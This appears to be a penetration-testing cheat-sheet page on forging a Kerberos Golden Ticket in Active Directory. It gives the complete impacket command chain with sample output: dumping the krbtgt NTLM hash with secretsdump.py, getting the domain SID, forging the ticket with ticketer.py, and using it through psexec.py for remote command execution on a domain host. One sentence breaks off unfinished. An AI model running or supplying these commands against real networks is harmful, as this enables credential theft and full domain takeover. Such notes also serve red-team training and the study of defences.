Golden Ticket

Using mimikatz

Using impacket tools

Extract the krbtgt NTLM hash

secretsdump.py Administrator:<PASSWORD>@10.10.100.200
[...]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5508500012cc005cf7082a9a89ebdfdf:::
[...]

Extract SID of Domain

lookupsid.py CONTROLLER.local/Administrator:<PASSWORD>@10.10.100.200
[...]
[*] Domain SID is: S-1-5-21-849420856-2351964222-986696166
[...]

Generating Golden Ticket

Using the krbtgt NTLM hash, the Domain SID, the Domain Name and a

ticketer.py -nthash "5508500012cc005cf7082a9a89ebdfdf" -domain-sid "S-1-5-21-849420856-2351964222-986696166" -domain "CONTROLLER.local" NonExistentUserBla

Using ticket

export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py CONTROLLER.local/Administrator@10.10.100.212 -k -no-pass

Last updated